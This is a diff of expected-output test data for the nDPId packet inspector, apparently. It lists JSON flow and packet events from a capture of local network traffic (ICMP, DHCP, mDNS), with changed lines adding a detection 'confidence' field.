 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1432582258825,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1432582258825,"pkt":"xiwDYGpkAPS5Jrv0CABFwAFIgM0AAEARKS3AqAIEW\/2wQck+JIABNDV+gPhBLgAAPABUWSgkrOczzTmmNaWeHGyeFn5K8vlkangPxwACY7IwMpCpL5qUBEDYknjmXwiwt1Sg\/GoDEpuWps7K3BPScguv1CoIPKC+VL4kk69VBQy2eU1f6p0OhYSXKAcM\/9HmK5KZeJJnhjzxZ+J\/AtWZs+X8uDaujdvMYKyUONaU\/07PQLiEd81h3NGLNxCpTNYPkmMGXMy1y+UaiUzN89zB2\/RkHbLVqN6e+nvnnRR2frMRlVsFWAJQmXtD929e1+a2u\/RdJfu15HCbSLl3jTXDbl84mpeVYYxkc3LSpxB7HrCYZEpYcCniVsfACmA6zpHVbv1BlaoQu+KuUWJT2eQ73+Vh12sP5aPix21kFcGvLfE3UalmxPkTCEhiCOUQRQbTvOcEo103"}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1432582259254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582259254,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIbNAAAEAR7efAqAIEAcJav8k+65gANKlVAAEAGCESpEKmTTdqxAPLVFlkZFwACAAUe9SyVdo3\/CPkaMOU00d3jUs\/Tzg="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1432582259886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582259886,"pkt":"xiwDYGpkAPS5Jrv0CABFwABI77MAAEARawTAqAIEAcJav8k+65gANKqSAAEAGCESpEK30Ms3\/7rzJdDOeSQACAAUjiMqFpbreAaLOXedI1Eon++y9eE="}
 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1432582267983,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1432582267983,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA44FwAAEABy33AqAIEW\/2wQQMDDx4AAAAARQAANHIMAAAvEUrCW\/2wQcCoAgQkgMk+ACAAAA=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.105516}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.105516}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1432582267990,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1432582267990,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA4yYsAAEAB4k7AqAIEW\/2wQQMDDx8AAAAARQAAM4K1AAAvEToaW\/2wQcCoAgQkgMk+AB8AAA=="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":830,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1432582267992,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1432582267992,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA4J2kAAEABhHHAqAIEW\/2wQQMDDx8AAAAARQAAM6fUAAAvERT7W\/2wQcCoAgQkgMk+AB8AAA=="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1432582271840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1432582271840,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIREwAAP8RdlkAAAAA\/\/\/\/\/wBEAEMBNOdgAQEGALYzLg0AAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"}
-00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}}
+00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}}
 00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1432582273095,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1432582273095,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRE0AAP8RdlgAAAAA\/\/\/\/\/wBEAEMBNOdeAQEGALYzLg0AAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"}
 00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1432582275776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1432582275776,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRE4AAP8RdlcAAAAA\/\/\/\/\/wBEAEMBNOdcAQEGALYzLg0ABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"}
 01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1432582276331,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1432582276331,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQGwAAEARsh7AqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1432582284805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1432582284805,"pkt":"AQBeAAD72DBiVgAcCABFAAA+cQoAAP8RGNup\/qbP4AAA+xTpFOkAKikcAAAAAAABAAAAAAAACkx1Y2FzLWlNYWMFbG9jYWwAAByAAQ=="}
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1432582284805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"ts_msec":1432582284805,"pkt":"MzMAAAD72DBiVgAcht1gA4nLACoR\/\/6AAAAAAAAA2jBi\/\/5WABz\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqIMQAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1432582284806,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1432582284806,"pkt":"AQBeAAD7xiwDYGpkCABFAAA+TlkAAP8RybDAqAIB4AAA+xTpFOkAKrdAAAAAAAABAAAAAAAACkx1Y2FzLWlNYWMFbG9jYWwAAByAAQ=="}
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1432582284806,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"ts_msec":1432582284806,"pkt":"MzMAAAD7xiwDYGpkht1gAhHGACoR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqK3YAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1432582285047,"pkt":"AQBeAAD72DBiVgAcCABFAACANrsAAP8RUuip\/qbP4AAA+xTpFOkAbF25AACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAA2jBi\/\/5WABzADAABgAEAAAB4AASp\/qbPwAwAHIABAAAAeAAQ\/oAAAAAAAADaMGL\/\/lYAHA=="}
-00668{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00694{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1432582285047,"pkt":"AQBeAAD7xiwDYGpkCABFAACAD1QAAP8RCHTAqAIB4AAA+xTpFOkAbI9mAACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAAxCwD\/\/5gamTADAABgAEAAAB4AATAqAIBwAwAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZA=="}
-00664{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
